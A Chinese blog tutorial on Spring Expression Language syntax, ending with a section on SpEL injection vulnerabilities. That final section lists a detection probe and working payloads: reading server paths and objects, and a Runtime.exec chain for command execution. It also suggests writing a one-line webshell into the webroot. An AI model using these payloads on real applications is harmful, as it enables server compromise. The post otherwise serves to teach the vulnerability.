SpEL表达式注入漏洞

一、什么是SpEL 表达式

Spring Expression Language(简称 SpEL)是一种功能强大的表达式语言、用于在运行时查询和操作对象图;语法上类似于 Unified EL,但提供了更多的特性,特别是方法调用和基本字符串模板函数。SpEL 的诞生是为了给 Spring 社区提供一种能够与 Spring 生态系统所有产品无缝对接,能提供一站式支持的表达式语言。 

优点:可以在运行时查询和操作数据,尤其是数组列表型数据,因此可以缩减代码量,优化代码结构。

二、用法

SpEL有三种用法,一种是在注解@Value中;一种是XML配置;最后一种是在代码块中使用Expression。

1、获取数据;2、执行运算;3、获取web开发常用对象;4、调用Java方法

三、表达式

1.  直接量表达式

    "#{'Hello World'}"

2.  直接使用java代码new/instance of

        此方法只能是java.lang 下的类才可以省略包名

    Expression exp = parser.parseExpression("new Spring('Hello World')");

3.  使用T(Type)

        使用“T(Type)”来表示java.lang.Class实例,同样,只有java.lang 下的类才可以省略包名。此方法一般用来引用常量或静态方法

    parser.parseExpression("T(Integer).MAX_VALUE");

4.  变量

        获取容器内的变量,可以使用“#bean_id”来获取。有两个特殊的变量,可以直接使用。

    #this 使用当前正在计算的上下文

    #root 引用容器的root对象

        String result2 = parser.parseExpression("#root").getValue(ctx, String.class); 

        String s = new String("abcdef");

        ctx.setVariable("abc",s);

        //取id为abc的bean,然后调用其中的substring方法

        parser.parseExpression("#abc.substring(0,1)").getValue(ctx, String.class);

5.  方法调用

            与Java代码没有什么区别,可见上面的例子

    可以自定义方法,如下:

Method parseInt = Integer.class.getDeclaredMethod("parseInt", String.class);

ctx.registerFunction("parseInt", parseInt);

ctx.setVariable("parseInt2", parseInt);

String expression1 = "#parseInt('3') == #parseInt2('3')";

        “registerFunction”和“setVariable”都可以注册自定义函数,但是两个方法的含义不一样,推荐使用“registerFunction”方法注册自定义函数。

6.  运算符表达式

算数表达式(“1+2-3*4/2″)

比较表达式(“1>2”)

逻辑表达式(“2>1 and (!true or !false)”)

赋值表达式(“#variableName=value”)

三目表达式(“表达式1?表达式2:表达式3”)

正则表达式(“123′ matches ‘\\d{3}”)

            等运算符,都可以直接放在SpEL中

7.  Elvis运算符

8.  安全保证

9.   集合定义

10.  集合访问

11.  集合修改

12.  集合选择

13.  集合投影

Springboot+thymeleaf+IDEA——SpEL表达式

1、基本表达式

<i th:text="${banner.imgUrl eq '1'}"></i>     // 判断相等

<i th:text="${banner.id gt 1}"></i>    //大于

<i th:text="${banner.id lt 2}"></i>     //小于

2、算术表达式

<p th:text="${4 * 5 - 6 + 7 / 8 % 9}"></p>

3、对象导航

<p th:text="${banners[1].id}"></p>

4、对象实例化

<p th:text="${new java.util.Date().getTime()}"></p>

5、T表达式

<p th:text="${T(java.lang.Math).random()}"></p>

6、内联表达式

<p>[[${banner.id}]]</p>


四、SpEL表达式注入漏洞

检测方式:

https://www.a.com/login?a=${10-9}

 表达式执行会会显在页面上,检查源码。

漏洞利用语句:

${pageContext} 对应于JSP页面中的pageContext对象(注意:取的是pageContext对象。)

${pageContext.getSession().getServletContext().getClassLoader().getResource("")}   获取web路径

${header}  文件头参数

${applicationScope} 获取webRoot

${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("命令").getInputStream())}  执行命令

渗透思路:获取webroot路径,exec执行命令echo写入一句话。

<p th:text="${#this.getClass().forName('java.lang.System').getProperty('user.dir')}"></p>   //获取web路径


详细复现过程:

https://www.stdusec.com/?p=1015

https://www.cnblogs.com/litlife/archive/2018/12/27/10183137.html

参考:

https://blog.csdn.net/qq_15071263/article/details/90676604

https://blog.csdn.net/u010086122/article/details/81566515

https://www.cnblogs.com/junsec/p/11132652.html

推荐阅读更多精彩内容

  • 这部分主要是与Java Web和Web Service相关的面试题。 96、阐述Servlet和CGI的区别? 答...
    杂货铺老板阅读 556评论 0 8
  • JAVA面试题 1、作用域public,private,protected,以及不写时的区别答:区别如下:作用域 ...
    JA尐白阅读 198评论 1 0
  • 1、SpEL概述 Spring Expression Language(SpEL)是一种强大的表达式语言,支持在运...
    夏与清风阅读 1,036评论 0 0
  • 词Java示例搜索字符串中的特定单词Java示例拆分正则表达式JJava示例拆分正则表达式Java示例替换首次出现...
    茶茶点阅读 558评论 0 0
  • JSP总结(经典) day1 JSP 定义: 1)Java Server Page, Java EE 组件,本...
    java日记阅读 1,865评论 0 13